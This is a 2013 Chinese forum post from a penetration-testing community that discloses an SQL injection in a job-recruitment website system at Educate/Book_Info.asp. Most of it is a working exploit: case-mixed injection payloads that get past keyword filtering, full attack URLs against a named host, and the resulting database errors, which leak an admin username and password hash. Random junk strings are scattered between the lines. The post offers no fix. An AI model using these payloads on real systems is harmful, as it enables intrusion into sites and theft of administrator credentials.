中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
4 I4 H5 q! S- E! I( [
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
$ ?4 P2 u3 ~4 q- D+ p7 r
exp:如下
- P3 U& \1 T" K" s
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, F' Z) ]! Z0 T& f1 \- J
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 ~5 Z; Q, i* `0 [
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% g& ?5 K. L' [7 H
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 Q: K6 W9 X, z, D/ O
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
5 Q/ w! a6 W1 V) a
/Educate/Book_Info.asp,行 8
8 a5 u- n, V4 h. q/ G% } w
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ _' f1 _, Q6 R! g
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
) [# x0 w# F5 j: ]7 C$ w- [
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
C/ B, _8 R$ V7 w L+ N% S
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2